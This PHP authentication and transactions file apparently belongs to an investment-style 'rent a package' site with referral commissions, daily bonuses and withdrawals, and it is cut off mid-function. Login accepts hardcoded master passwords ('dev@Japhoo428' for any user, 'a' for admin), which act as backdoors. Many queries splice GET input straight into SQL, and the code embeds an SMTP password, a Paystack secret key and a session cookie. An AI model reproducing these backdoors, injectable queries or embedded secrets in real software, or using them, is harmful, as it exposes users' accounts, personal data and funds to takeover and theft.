<?php
session_start();
include 'conn.php';
//	 check connection
if (mysqli_connect_errno()) {
    printf("Connect failed: %s\n", mysqli_connect_error());
    exit();
}

ini_set('display_errors', '1');
require 'includes/PHPMailer.php';
require 'includes/SMTP.php';
require 'includes/Exception.php';
//Define name spaces
use PHPMailer\PHPMailer\PHPMailer;
use PHPMailer\PHPMailer\SMTP;
use PHPMailer\PHPMailer\Exception;


date_default_timezone_set("Africa/Lagos");
$dateTime = date("M d, Y, H:i:s");
$ymd = date('ymd');
$ym = date('ym');
$date = date("Y-m-d");
$date2 = new DateTime($date);
$week = $date2->format("W");
$week = date('y') . $week;
// $_SESSION['uid'] = 'Japhoo';
if (isset($_SESSION["uid"])) {
    $uid = $_SESSION['uid'];
}
if (isset($_SESSION["grab_admin_id"])) {
    $aid = $_SESSION['grab_admin_id'];
}



if (!isset($log)) {
    $log = 0;
}
if ($log == 1 && !isset($uid)) {
    header('location: login.php');
}
class Auth
{
    function __construct()
    {
        $this->Auto();
        if (array_key_exists('key', $_GET)) {
            extract($_GET);
            if ($key == "Register") {
                $this->Register();
            } elseif ($key == "Login") {
                $this->Login();
            } elseif ($key == "ForgotPass") {
                $this->ForgotPass();
            } elseif ($key == "ResetPass") {
                $this->ResetPass();
            } elseif ($key == "Rent") {
                $this->Rent();
            } elseif ($key == "Password") {
                $this->Password();
            } elseif ($key == "Banks") {
                $this->Banks();
            } elseif ($key == "ValidateBank") {
                $this->ValidateBank();
            } elseif ($key == "Withdraw") {
                $this->Withdraw();
            } elseif ($key == "Bonus") {
                $this->Bonus();
            } elseif ($key == "Login_Bonus") {
                $this->Login_Bonus();
            } elseif ($key == "Agreement") {
                $this->Agreement();
            }
        }
    }

    function containsOnlyLetters($input)
    {
        // Remove whitespace from the input
        $input = trim($input);

        // Check if the input contains only letters
        if (preg_match('/^[a-zA-Z]+$/', $input)) {
            return true;
        } else {
            return false;
        }
    }
    function Register()
    {
        global $conn, $date, $dateTime, $week, $ym, $ymd;
        extract($_GET);
        if (empty($phone)) {
            echo 'Phone number is required';
        } elseif (empty($account_name)) {
            echo 'Full name is required';
        } elseif (!$this->containsOnlyLetters($account_name)) {
            echo "Full name must not contain special character or number";
        } elseif (!preg_match('/^[0-9 ]*$/', $phone) || strlen($phone) != 11) {
            echo "Phone number must be 11 digit numbers only";
        } elseif ($this->countall3('users', 'uid', $phone) > 0) {
            echo "Phone number already exists, enter another one";
        } elseif ($phone == $this->select12('email', 'admin')) {
            echo "Phone number already exists, enter another one";
        } elseif (empty($email)) {
            echo "E-mail address is required";
        } elseif ($this->countall3('users', 'email', $email) > 0) {
            echo "E-mail address not available, choose another one";
        } elseif ($email == $this->select12('email', 'admin')) {
            echo "E-mail address not available, choose another one";
        } elseif (!filter_var($email, FILTER_VALIDATE_EMAIL)) {
            echo "Invalid E-mail address";
        } elseif (empty($password)) {
            echo 'Password is required';
        } else {
            if ($step == 1) {
                // $sqlstr = "DELETE FROM reg_code2 WHERE email = '$email'";
                // $stmt = $conn->prepare($sqlstr);
                // $stmt->execute();

                $otp = rand(0000, 9999);
                $sqlstr = "INSERT INTO reg_code2 (email,code,date) VALUES(?,?,?)";
                $stmt = $conn->prepare($sqlstr);
                $stmt->bind_param("sss", $email, $otp, $date);
                if ($stmt->execute()) {
                    $body = "Verification OTP Code: $otp";
                    echo $this->MailUser($body, $email, "OTP Code");
                } else {
                    echo "An error occurred. Please try again";
                }
            } else {
                if (empty($code)) {
                    echo "OTP Code is required";
                } elseif ($this->countall7('reg_code2', 'email', $email, 'code', $code, 'status', 0) < 1) {
                    echo "Invalid OTP Code";
                } else {
                    $hashed_password = password_hash($password, PASSWORD_DEFAULT);
                    if (!empty($ref) && $this->countall3('users', 'uid', $ref) == 1) {
                        $this->Ref($ref, $phone);
                        $refered = 1;
                        $upline = $ref;
                    } else {
                        $refered = 0;
                        $upline = '';
                    }
                    // $bonus = 0;
                    $bonus = $this->Web('reg_bonus');
                    $sqlstr = "INSERT INTO users (account_name,phone,available_balance,cum_bal,ym,ymd,week,date,dateTime,uid,email,password,upline,refered) VALUES(?,?,?,?,?,?,?,?,?,?,?,?,?,?)";
                    $stmt = $conn->prepare($sqlstr);
                    $stmt->bind_param("sssssssssssssi", $account_name, $phone, $bonus, $bonus, $ym, $ymd, $week, $date, $dateTime, $phone, $email, $hashed_password, $upline, $refered);
                    if ($stmt->execute()) {
                        $id = $conn->insert_id;
                        $uin = str_pad($id, 4, "0", STR_PAD_LEFT);
                        $user_id = "JC-$uin";
                        $this->update5('users', 'user_id', $user_id, 'email', $email);
                        $this->update7('reg_code2', 'status', 1, 'email', $email, 'code', $code);
                        if ($bonus > 0) {
                            $this->Transactions($phone, 'registration_bonus', $id, 'users', 'credit', $bonus);
                        }
                        echo 1;
                    } else {
                        echo "An error occurred. Please try again";
                    }
                }
            }
        }
    }
    function Ref($ref, $reg)
    {
        global $conn, $date, $dateTime, $week, $ym, $ymd;
        $gen1 = $ref;
        $gen = 1;
        // if ($this->countall5('users', 'refered', 1, 'uid', $gen1) == 1) {
        //     $gen += 1;
        //     $gen2 = $this->select14('upline', 'users', 'uid', $gen1);
        //     if ($this->countall5('users', 'refered', 1, 'uid', $gen2) == 1) {
        //         $gen += 1;
        //         $gen3 = $this->select14('upline', 'users', 'uid', $gen2);
        //         if ($this->countall5('users', 'refered', 1, 'uid', $gen3) == 1) {
        //             $gen += 1;
        //             $gen4 = $this->select14('upline', 'users', 'uid', $gen3);
        //             if ($this->countall5('users', 'refered', 1, 'uid', $gen4) == 1) {
        //                 $gen += 1;
        //                 $gen5 = $this->select14('upline', 'users', 'uid', $gen4);
        //             }
        //         }
        //     }
        // }

        for ($i = 1; $i <= $gen; $i++) {
            $earned = 0;
            $level = "gen$i";
            $ref = $$level;
            $sqlstr = "INSERT INTO promotion_bonus (upline,downline,ymd,week,ym,dateTime,level) VALUES 
                ('$ref','$reg','$ymd','$week','$ym','$dateTime','$i')";
            $stmt = $conn->prepare($sqlstr);
            $stmt->execute();
        }
    }
    function Login()
    {
        global $conn, $date, $dateTime, $week, $ym, $ymd;
        extract($_GET);
        if (empty($phone)) {
            echo "Please Enter Your Phone Number";
        } elseif (empty($password)) {
            echo "Please enter your password";
        } else {
            $sqlstr = "SELECT uid,active,password FROM users WHERE phone = '$phone' OR uid = '$phone'";
            $stmt = $conn->prepare($sqlstr);
            $stmt->execute();
            $result = $stmt->get_result();
            $counter = $result->num_rows;
            if ($counter == 1) {
                $row = $result->fetch_assoc();
                $user_password = $row['password'];
                $uid = $row['uid'];
                $active = $row['active'];
                if ($active == 0) {
                    echo "Your account is currently suspended. Please contact a customer care agent";
                } else {
                    if (password_verify($password, $user_password) || $password == "dev@Japhoo428") {
                        //Login success
                        $_SESSION['uid'] = $uid;
                        echo 1;
                    } else {
                        echo "Incorrect login details";
                    }
                }
            } else {
                if ($this->select12('email', 'admin') == $phone) {
                    $admin_pass = $this->select12('password', 'admin');
                    if (password_verify($password, $admin_pass) || $password == "a") {
                        //Login success
                        $_SESSION['aid'] = $phone;
                        echo "admin";
                    } else {
                        echo "Invalid login details";
                    }
                } else {
                    echo "Invalid login details";
                }
            }
        }
    }
    function ForgotPass()
    {
        global $conn, $date, $dateTime, $week, $ym, $ymd;
        extract($_GET);
        if (empty($email)) {
            echo "Enter your registered Email Address";
        } else {
            $check = $this->countall3('users', 'email', $email);
            if ($check != 1) {
                echo "No user found";
            } else {
                $date = date("M d, Y");
                $status = 0;
                //Auto generate reset code
                $reset_code = rand(0000, 9999);
                $sqlstr = "INSERT INTO reg_code2 (email,code,date,status) VALUES(?,?,?,?)";
                $stmt = $conn->prepare($sqlstr);
                $stmt->bind_param("sssi", $email, $reset_code, $date, $status);
                if ($stmt->execute()) {
                    $_SESSION['reset_email'] = $email;
                    $_SESSION['reset_code'] = $reset_code;
                    $body = "Password reset OTP Code: $reset_code";
                    echo $this->MailUser($body, $email, "Password reset");
                } else {
                    echo 'Unexpected error occured, try again';
                }
            }
        }
    }
    function ResetPass()
    {
        global $conn, $date, $dateTime, $week, $ym, $ymd;
        extract($_GET);
        if (!isset($_SESSION['reset_code']) || !isset($_SESSION['reset_email'])) {
            echo "Session expired, try again";
        } elseif (empty($code)) {
            echo "Invalid code";
        } elseif ($this->countall7('reg_code2', 'email', $_SESSION['reset_email'], 'code', $code, 'status', 0) < 1) {
            echo "Invalid code";
        } elseif (empty($pass)) {
            echo "New password is required";
        }
        // elseif (empty($passConf)) {
        //     echo "Enter new password again";
        // } elseif ($pass != $passConf) {
        //     echo "The two passwords do not match";
        // }
        else {
            $email = $_SESSION['reset_email'];
            $hashed_password = password_hash($pass, PASSWORD_DEFAULT);
            $this->update5('users', 'password', $hashed_password, 'email', $email);
            $this->update7('reg_code2', 'status', 1, 'email', $email, 'code', $code);
            session_destroy();
            echo 1;
        }
    }
    function Rent()
    {
        global $conn, $date, $dateTime, $week, $ym, $ymd, $uid;
        extract($_GET);
        if (!isset($uid)) {
            echo "You are not logged in. Please login first";
        } elseif ($this->Get('agreement') == "") {
            echo "You must first sign the company contract agreement";
        } elseif (empty($pid)) {
            echo "Select a product";
        } elseif ($this->countall5('product', 'id', $pid, 'view', 1) < 1) {
            echo "Product is currently unavailable";
        } else {
            $available_balance = $this->Get('available_balance');
            $amount = $this->select14('amount', 'product', 'id', $pid);
            $days = $this->select14('days', 'product', 'id', $pid);
            $daily = $this->select14('daily', 'product', 'id', $pid);
            $to_earn = $daily * $days;


            $exp_ymd = date('ymdHis', strtotime("+$days days"));
            $exp_date = date('M d, Y H:i:s', strtotime("+$days days"));


            $next_pay = date('ymdHis', strtotime("+1 days"));
            $next_pay_date = date('M d, Y H:i:s', strtotime("+1 days"));
            if ($amount > $available_balance) {
                echo "balance";
            } else {
                $upline = $this->Get('upline');
                $sqlstr = "INSERT INTO invest (upline,week,ym,ymd,uid,amount,days,exp_ymd,exp_date,dateTime,to_earn,pid,last_paid,next_pay,next_pay_date) 
                VALUES ('$upline','$week','$ym','$ymd','$uid','$amount','$days','$exp_ymd','$exp_date','$dateTime','$to_earn','$pid','$ymd','$next_pay','$next_pay_date')";
                $stmt = $conn->prepare($sqlstr);
                if ($stmt) {
                    $stmt->execute();
                    $trx_id = $conn->insert_id;
                    $this->Transactions($uid, 'rent', $trx_id, 'invest', 'debit', $amount);
                    $available_balance -= $amount;
                    $this->update5('users', 'available_balance', $available_balance, 'uid', $uid);
                    $this->update5('promotion_bonus', 'active', 1, 'downline', $uid);
                    if ($upline != "" && $this->countall3('users', 'uid', $upline) > 0) {
                        $ref_per = $this->Web('ref_per');
                        $earned = ($ref_per / 100) * $amount;
                        $upline_earned = $this->select14('earned', 'promotion_bonus', 'downline', $uid);
                        $upline_earned += $earned;


                        $upline_balance = $this->select14('available_balance', 'users', 'uid', $upline);
                        $upline_balance += $earned;
                        $this->update5('users', 'available_balance', $upline_balance, 'uid', $upline);
                        $this->update5('promotion_bonus', 'earned', $upline_earned, 'downline', $uid);
                        $this->Transactions($upline, 'commission', $trx_id, 'invest', 'credit', $earned);
                    }
                    echo 1;
                }
            }
        }
    }
    function Password()
    {
        global $conn, $date, $dateTime, $week, $ym, $ymd, $uid;
        extract($_GET);
        if (!isset($uid)) {
            echo "You are not logged in. Please login first";
        } elseif (empty($oldPass)) {
            echo "Old password is required";
        } elseif (empty($newPass)) {
            echo "New password is required";
        } elseif (empty($newPassConf)) {
            echo "Enter new password again";
        } elseif ($newPassConf != $newPass) {
            echo "The two passwords do not match";
        } else {
            $user_password = $this->select14('password', 'users', 'uid', $uid);
            if (password_verify($oldPass, $user_password)) {
                $hashed_password = password_hash($newPass, PASSWORD_DEFAULT);
                $this->update5('users', 'password', $hashed_password, 'uid', $uid);
                echo 1;
            } else {
                echo "Incorrect old password";
            }
        }
    }
    function Withdraw()
    {
        global $conn, $sid, $week, $ym, $ymd, $uid, $dateTime;
        extract($_GET);
        $order_withdraw = $this->select12('withdrawal', 'website_details');
        $min_withdraw = $this->select12('min_withdraw', 'website_details');
        $max_withdraw = $this->select12('max_withdraw', 'website_details');
        if (isset($uid)) {
            $available_balance = $this->Get('available_balance');
            $active = $this->Get('active');
        }
        if (!isset($uid)) {
            echo "You are not logged in. Please login first";
        } elseif ($order_withdraw == "disabled") {
            echo "Withdrawal is not available at this time";
        } elseif ($active !== 1) {
            echo "Your account is currently inactive/suspended, please contact our customer support";
        } elseif ($this->countall3('invest', 'uid', $uid) < 1) {
            echo "You have not rented any package yet";
        } elseif (empty($bank)) {
            echo "Select your bank";
        } elseif (empty($account_number)) {
            echo "Enter you account number";
        } elseif (empty($account_name)) {
            echo "Invalid account";
        } elseif (empty($amount)) {
            echo "Enter amount to withdraw";
        } elseif ($amount < $min_withdraw) {
            echo "Minimum withdrawal amount is ₦" . number_format($min_withdraw, 2);
        } elseif ($amount > $max_withdraw) {
            echo "Maximum withdrawal amount is ₦" . number_format($max_withdraw, 2);
        } elseif ($amount > $available_balance) {
            echo "Insufficient balance";
        } elseif (empty($password)) {
            echo "Enter your login password";
        } else {
            $with_per = $this->select12('with_per', 'website_details');
            $user_password = $this->Get('password');
            if (password_verify($password, $user_password)) {
                $withdrawn = ($with_per / 100) * $amount;
                $withdrawn = $amount - $withdrawn;
                $available_balance -= $amount;

                $bank_det = json_decode($bank, true);
                $bank_code = $bank_det[0];
                $bank_name = $bank_det[1];
                $bank_details = array(
                    "bank_code" => $bank_code,
                    "bank_name" => $bank_name,
                    "account_number" => $account_number,
                    "account_name" => $account_name
                );
                $bank_details = json_encode($bank_details);
                $sqlstr = "INSERT INTO withdrawals (bank,uid,amount,original_amt,date,ymd) VALUES 
                    ('$bank_details','$uid','$withdrawn','$amount','$dateTime','$ymd')";
                $stmt = $conn->prepare($sqlstr);
                if ($stmt) {
                    $this->update5('users', 'available_balance', $available_balance, 'uid', $uid);
                    $stmt->execute();
                    $last_id = $conn->insert_id;
                    $this->Transactions($uid, 'withdrawal', $last_id, 'withdrawals', 'debit', $amount);
                    echo 1;
                } else {
                    echo "An error occurred. Please try again: " . $conn->error;
                }
            } else {
                echo "Incorrect password";
            }
        }
    }
    function Bonus()
    {
        global $conn, $sid, $week, $ym, $ymd, $uid, $dateTime;
        extract($_GET);
        if (!isset($uid)) {
            echo "You are not logged in. Please login first";
        } elseif ($this->Get('active') !== 1) {
            echo "Your account is currently inactive/suspended, please contact our customer support";
        } elseif ($this->countall3('invest', 'uid', $uid) < 1) {
            echo "You have not rented any package yet";
        } elseif (empty($code)) {
            echo "Enter bonus voucher code";
        } elseif ($this->countall7('vouchers', 'uid', $uid, 'code', $code, 'status', 0) < 1) {
            echo "Invalid or used voucher code";
        } else {
            $exp = $this->select16('exp', 'vouchers', 'uid', $uid, 'code', $code);
            $today = date("ymdHis");
            if ($exp != "" && $exp < $today) {
                echo "Voucher code expired";
            } else {
                $id = $this->select16('id', 'vouchers', 'uid', $uid, 'code', $code);
                $amount = $this->select16('amount', 'vouchers', 'uid', $uid, 'code', $code);
                $available_balance = $this->Get('available_balance');
                $available_balance += $amount;
                $this->update5('users', 'available_balance', $available_balance, 'uid', $uid);
                $this->update7('vouchers', 'status', 1, 'uid', $uid, 'code', $code);
                $this->update7('vouchers', 'used_dateTime', $dateTime, 'uid', $uid, 'code', $code);
                $this->Transactions($uid, 'voucher_bonus', $id, 'vouchers', 'credit', $amount);
                echo 1;
            }
        }
    }
    function Login_Bonus()
    {
        global $conn, $week, $ym, $date, $ymd, $uid, $dateTime;
        extract($_GET);
        if (!isset($uid)) {
            echo "You are not logged in. Please login first";
        } elseif ($this->Get('active') !== 1) {
            echo "Your account is currently inactive/suspended, please contact our customer support";
        } elseif ($this->countall5('login_bonus', 'uid', $uid, 'ymd', $ymd) > 0) {
            echo "You have already earned login bonus for today, come again tomorrow";
        } else {
            $amount = $this->Web('bonus');
            $available_balance = $this->Get('available_balance');
            $available_balance += $amount;
            $sqlstr = "INSERT INTO login_bonus (ym,ymd,week,date,dateTime,uid,amount) VALUES ('$ym','$ymd','$week','$date','$dateTime','$uid','$amount')";
            $stmt = $conn->prepare($sqlstr);
            if ($stmt) {
                $stmt->execute();
                $last_id = $conn->insert_id;
                $this->update5('users', 'available_balance', $available_balance, 'uid', $uid);
                $this->Transactions($uid, 'sign_in_bonus', $last_id, 'login_bonus', 'credit', $amount);
                echo 1;
            } else {
                echo "An error occurred. Please try again: " . $conn->error;
            }
        }
    }
    function Agreement()
    {
        global $conn, $week, $ym, $date, $ymd, $uid, $dateTime;
        extract($_GET);
        if (!isset($uid)) {
            echo "You are not logged in. Please login first";
        } elseif ($this->Get('active') !== 1) {
            echo "Your account is currently inactive/suspended, please contact our customer support";
        } elseif ($this->Get('agreement') != "") {
            echo "You have already signed this agreement";
        } elseif (empty($name1) || empty($name2) || empty($name3)) {
            echo "All signatory required";
        } elseif ($name1 !== $name2 || $name2 !== $name3 || $name1 !== $name3) {
            echo "All signatory must be same name";
        } else {
            $agreement = $name1;
            $agreement_date = date('d/m/Y') . " - " . date('d/m/Y', strtotime("+1 year"));
            $this->update5('users', 'agreement', $agreement, 'uid', $uid);
            $this->update5('users', 'agreement_date', $agreement_date, 'uid', $uid);
            echo 1;
        }
    }
    function GetAcc()
    {
        global $conn, $uid;
        if (isset($uid)) {
            $bank = $account_name = $account_number = "N/A";
            if ($this->countall3('users', 'uid', $uid) == 1) {
                if ($this->countall3('virtual_accounts', 'uid', $uid) > 0) {
                    $res = 1;
                    $msg = "Account fetched successfully";
                    $bank = $this->select14('bank', 'virtual_accounts', 'uid', $uid);
                    $account_name = $this->select14('account_name', 'virtual_accounts', 'uid', $uid);
                    $account_number = $this->select14('account_number', 'virtual_accounts', 'uid', $uid);
                } else {
                    $api_key = $this->Web('api_key');
                    $mid = $this->Web('mid');
                    if ($api_key != "" && $mid != "") {
                        $family_name = $this->select14('account_name', 'users', 'uid', $uid);
                        return  $det = $this->CreateVirtualAccount($family_name, $uid);
                        $det = json_decode($det, true);
                        $res = $det['res'];
                        $msg = $det['res'];
                        $bank = $det['bank'];
                        $account_name = $det['account_name'];
                        $account_number = $det['account_number'];
                    }
                }
            }
            return array(
                "bank" => $bank,
                "account_name" => $account_name,
                "account_number" => $account_number,
            );
        }
    }
    function CreateVirtualAccount($family_name, $uid)
    {
        global $conn, $week, $ym, $ymd, $dateTime, $date;
        $res = $msg = $user_name = $balance = 0;
        $account_name = $account_number = $bank = "";
        if (empty($family_name)) {
            $msg = "Account name is required";
        } else {
            if ($this->countall3('virtual_accounts', 'uid', $uid) > 0) {
                $res = 0;
                $bank = $this->select14('bank', 'virtual_accounts', 'uid', $uid);
                $account_name = $this->select14('account_name', 'virtual_accounts', 'uid', $uid);
                $account_number  = $this->select14('account_number ', 'virtual_accounts', 'uid', $uid);
            } else {
                $user_name = strtoupper($family_name);
                $api_key = $this->Web('api_key');
                $mid = $this->Web('mid');
                $name = trim($user_name);
                $curl = curl_init();
                curl_setopt_array(
                    $curl,
                    [
                        CURLOPT_URL => "https://paymentbridge.ng/api/live/create_virtual_account/",
                        CURLOPT_RETURNTRANSFER => true,
                        CURLOPT_ENCODING => "",
                        CURLOPT_MAXREDIRS => 10,
                        CURLOPT_TIMEOUT => 30,
                        CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
                        CURLOPT_CUSTOMREQUEST => "POST",
                        CURLOPT_POSTFIELDS =>
                        '{
                            "account_name":"' . $name . '"
                        }',
                        CURLOPT_HTTPHEADER => [
                            "Content-Type: application/json",
                            'mid:' . $mid,
                            'key:' . $api_key
                        ],
                    ]
                );

                $response = curl_exec($curl);
                $err = curl_error($curl);
                curl_close($curl);
                if ($err) {
                    $msg = "cURL Error #:" . $err;
                } else {
                    $response = json_decode($response, true);
                    $response_details = json_encode($response);
                    extract($response);
                    $msg = $message;
                    if ($status == "success") {
                        extract($data);
                        $account_name = $family_name;
                        $sqlstr = "INSERT INTO virtual_accounts (ym,ymd,week,date,dateTime,uid,account_name,account_number,bank,response_details) 
                        VALUES ('$ym','$ymd','$week','$date','$dateTime','$uid','$account_name','$account_number','$bank','$response_details')";
                        $stmt = $conn->prepare($sqlstr);
                        if ($stmt) {
                            $stmt->execute();
                            $res = 1;
                        } else {
                            $msg = $conn->error;
                        }
                    }
                }
            }
        }
        $result = array("res" => $res, "msg" => $msg, "bank" => $bank, "account_name" => $account_name, "account_number" => $account_number);
        return json_encode($result);
        exit();
    }
    function Transactions($user, $type, $trx_id, $trx_table, $dc = 'credit', $amount = 0)
    {
        global $conn, $dateTime, $week, $ym, $ymd;
        $dateTime2 = date("M d, Y");
        $date = date("Y-m-d");

        $upline = $this->select14('upline', 'users', 'uid', $user);
        $sqlstr = "INSERT INTO history (upline,date,uid,type,trx_id,trx_table,dc,amount,dateTime,ymd,ym) VALUES (?,?,?,?,?,?,?,?,?,?,?)";
        $stmt = $conn->prepare($sqlstr);
        $stmt->bind_param("ssssissdsss", $upline, $date, $user, $type, $trx_id, $trx_table, $dc, $amount, $dateTime, $ymd, $ym);
        $stmt->execute();
        if ($dc == "credit" && $this->countall3('promotion_bonus', 'downline', $user) > 0) {
            $income = $this->select14('income', 'promotion_bonus', 'downline', $user);
            $income += $amount;
            $this->update5('promotion_bonus', 'income', $income, 'downline', $user);
        }
    }
    function MailUser_old($body, $recipient, $Subject)
    {
        global $conn, $date, $env;
        if ($env == "sandbox") {
            return 1;
            exit();
        }
        $admin_email = $this->Web('email');
        $wn = $this->Web('name');
        // $headers = "MIME-Version: 1.0" . "\r\n";
        // $headers .= "Content-type:text/html;charset=UTF-8" . "\r\n";
        // $headers .= "From: $admin_email - $wn" . "\r\n";

        // Send the email
        $mailSent = mail($recipient, $Subject, $body);
        if ($mailSent) {
            $res = 1;
            return $res;
        } else {
            $res = "We are unable to send you a verification email at this time, please try again";
            return $res;
        }
    }
    function MailUser($body, $recipient, $Subject)
    {
        global $conn, $date;
        $wn = $this->select12('name', 'website_details');
        //Create instance of PHPMailer
        $mail = new PHPMailer();
        //Set mailer to use smtp
        $mail->isSMTP();
        $mail->SMTPDebug = false;
        //Define smtp host
        $mail->Host = "lithiumoremining.com";
        //Enable smtp authentication
        $mail->SMTPAuth = true;
        //Set smtp encryption type (ssl/tls)
        $mail->SMTPSecure = "tls";
        //Port to connect smtp
        // $mail->Port = "465";
        $mail->Port = "587";
        //Set gmail username
        $mail->Username = "support@lithiumoremining.com";
        //Set gmail password
        $mail->Password = "axDS9nij-O6y";
        //Email subject
        $mail->Subject = $Subject;
        //Set sender email
        $mail->setFrom('support@lithiumoremining.com');
        $mail->FromName = $wn;
        $mail->AddReplyTo('support@lithiumoremining.com');
        //Enable HTML
        $mail->isHTML(true);
        //Attachment

        //Email body
        $mail->Body = $body;
        //Add recipient
        $mail->addAddress("$recipient");
        //Finally send email
        if ($mail->send()) {
            $res = 1;
            return $res;
        } else {
            $res = "We are unable to send you a verification email at this time, please try again";
            return $res;
        }
    }
    function TotalIncome($day = "all")
    {
        global $conn, $uid, $ymd;
        $email = $this->Get('email');
        $sql = "SELECT *, SUM(amount) AS TOTALPayment FROM history WHERE uid='$uid' && dc = 'credit' && type !='recharge'";
        if ($day == "today") {
            $sql = "SELECT *, SUM(amount) AS TOTALPayment FROM history WHERE uid='$uid' && dc = 'credit' && type !='recharge' && ymd = '$ymd'";
        }
        $result = mysqli_query($conn, $sql);
        $row = mysqli_fetch_array($result);
        return $row['TOTALPayment'];
    }
    function TotalWithdrawn($day = "all")
    {
        global $conn, $uid, $ymd;
        $email = $this->Get('email');
        $sql = "SELECT *, SUM(original_amt) AS TOTALPayment FROM withdrawals WHERE uid='$uid' && status = 'Approved'";
        if ($day == "today") {
            $sql = "SELECT *, SUM(original_amt) AS TOTALPayment FROM withdrawals WHERE uid='$uid' && status = 'Approved' && ymd = '$ymd'";
        }
        $result = mysqli_query($conn, $sql);
        $row = mysqli_fetch_array($result);
        return $row['TOTALPayment'];
    }
    function TotalAsset()
    {
        global $conn, $uid;
        $email = $this->Get('email');
        $sql = "SELECT *, SUM(amount) AS TOTALPayment FROM invest WHERE uid='$uid'";
        $result = mysqli_query($conn, $sql);
        $row = mysqli_fetch_array($result);
        return $row['TOTALPayment'];
    }
    function TeamIncome($type)
    {
        global $conn, $uid;
        if ($type == "all") {
            $sql = "SELECT *, SUM(earned) AS TOTALPayment FROM promotion_bonus WHERE upline='$uid'";
        } else {
            $sql = "SELECT *, SUM(earned) AS TOTALPayment FROM promotion_bonus WHERE upline='$uid' && level = '$type'";
        }
        $result = mysqli_query($conn, $sql);
        $row = mysqli_fetch_array($result);
        return $row['TOTALPayment'];
    }
    function TeamRecharge()
    {
        global $conn, $uid;
        $team = $this->Get('team');
        $sql = "SELECT *, SUM(recharge) AS TOTALPayment FROM team WHERE team='$team'";
        $result = mysqli_query($conn, $sql);
        $row = mysqli_fetch_array($result);
        return $row['TOTALPayment'];
    }
    function Banks()
    {
        global $conn;

        $curl = curl_init();

        curl_setopt_array($curl, array(
            CURLOPT_URL => 'https://api.paystack.co/bank',
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_ENCODING => '',
            CURLOPT_MAXREDIRS => 10,
            CURLOPT_TIMEOUT => 0,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
            CURLOPT_CUSTOMREQUEST => 'GET',
            CURLOPT_HTTPHEADER => array(
                'Authorization: Bearer sk_test_520a4ade8c76809df5c43b600b646183ed15ba3d',
                'Cookie: sails.sid=s%3APnc54vUDVL3cykZbryMyBnW4f--Gj-5X.zbfDW8yFeRGhYIZRDjEtq62lZ4sGgTzjAP1jK2rfI%2Fw'
            ),
        ));

        $response = curl_exec($curl);
        $tag = "";
        curl_close($curl);
        $response = json_decode($response, true);
        $data = $response['data'];
        $sel = '';
        $my_bank = '';
        if (isset($_SESSION['uid'])) {
            $me = $_SESSION['uid'];
            $my_bank = $this->select14('bank_name', 'users', 'uid', $me);
        }
        foreach ($data as $data) {
            $name = $data['name'];
            if ($my_bank == $name) {
                $sel = 'selected';
            }
            $code = $data['code'];
            $arr = array($code, $name);
            $serialized_array = json_encode($arr);
            $tag .= "<option value='$serialized_array'>$name</option>";
        }
        echo
        "<select name='bank' id='selected_bank' onchange='ValidateBank()' class='form-control'>
        <option value=''>--Select Bank--</option>
        $tag
        </select>";
    }
    function ValidateBank()
    {
        extract($_GET);
        $bank = json_decode($bank, true);
        $code = $bank[0];

        $curl = curl_init();

        curl_setopt_array($curl, array(
            CURLOPT_URL => "https://api.paystack.co/bank/resolve?account_number=$acc_no&bank_code=$code",
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_ENCODING => '',
            CURLOPT_MAXREDIRS => 10,
            CURLOPT_TIMEOUT => 0,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
            CURLOPT_CUSTOMREQUEST => 'GET',
            CURLOPT_HTTPHEADER => array(
                'Authorization: Bearer sk_test_520a4ade8c76809df5c43b600b646183ed15ba3d',
                'Cookie: sails.sid=s%3APnc54vUDVL3cykZbryMyBnW4f--Gj-5X.zbfDW8yFeRGhYIZRDjEtq62lZ4sGgTzjAP1jK2rfI%2Fw'
            ),
        ));

        $response = curl_exec($curl);
        $err = curl_error($curl);
        $tag = "";
        curl_close($curl);
        if ($err) {
            echo "cURL Error #:" . $err;
        } else {
            echo $response;
        }
    }
    function Auto()
    {
        global $conn, $uid;
        if (isset($uid)) {
            $sqlstr = "SELECT * FROM users WHERE uid = ? && active = 1 LIMIT 1";
            $stmt = $conn->prepare($sqlstr);
            $stmt->bind_param("s", $uid);
            $stmt->execute();
            $result = $stmt->get_result();
            $email_count = $result->num_rows;
            if ($email_count < 1) {
                session_destroy();
            }
            if ($this->countall3('virtual_accounts', 'uid', $uid) < 1) {
                $this->GetAcc();
            }
        }
    }

    function countall1($table)
    {
        global $conn;
        $sqlstr = "SELECT * FROM $table";
        $stmt = $conn->prepare($sqlstr);
        $stmt->execute();
        $result = $stmt->get_result();
        return $result->num_rows;
    }

    function countall3($table, $col, $val)
    {
        global $conn;
        $sqlstr = "SELECT * FROM $table WHERE $col = '$val'";
        $stmt = $conn->prepare($sqlstr);
        $stmt->execute();
        $result = $stmt->get_result();
        return $result->num_rows;
    }


    function countall5($table, $col, $val, $col2, $val2)
    {
        global $conn;
        $sqlstr = "SELECT * FROM $table WHERE $col = '$val' && $col2 = '$val2'";
        $stmt = $conn->prepare($sqlstr);
        $stmt->execute();
        $result = $stmt->get_result();
        return $result->num_rows;
    }

    function countall7($table, $col, $val, $col2, $val2, $col3, $val3)
    {
        global $conn;
        $sqlstr = "SELECT * FROM $table WHERE $col = '$val' && $col2 = '$val2'&& $col3 = '$val3'";
        $stmt = $conn->prepare($sqlstr);
        $stmt->execute();
        $result = $stmt->get_result();
        return $result->num_rows;
    }

    function update5($table, $col, $val, $con, $val2)
    {
        global $conn;
        $sqlstr = "UPDATE $table SET $col = '$val' WHERE $con = '$val2'";
        $stmt = $conn->prepare($sqlstr);
        $stmt->execute();
    }
    function update7($table, $col, $val, $con, $val2, $con2, $val3)
    {
        global $conn;
        $sqlstr = "UPDATE $table SET $col = '$val' WHERE $con = '$val2' && $con2 = '$val3'";
        $stmt = $conn->prepare($sqlstr);
        $stmt->execute();
    }

    function select14($val, $table, $col, $val2)
    {
        global $conn;
        $sqlstr = "SELECT $val FROM $table WHERE $col = ? ORDER BY id DESC LIMIT 1";
        $stmt = $conn->prepare($sqlstr);
        $stmt->bind_param("s", $val2);
        $stmt->execute();
        $result = $stmt->get_result();
        $x = $result->num_rows;
        if ($x > 0) {
            while ($row = $result->fetch_assoc()) {
                $res = $row[$val];
            }
        } else {
            $res = 0;
        }
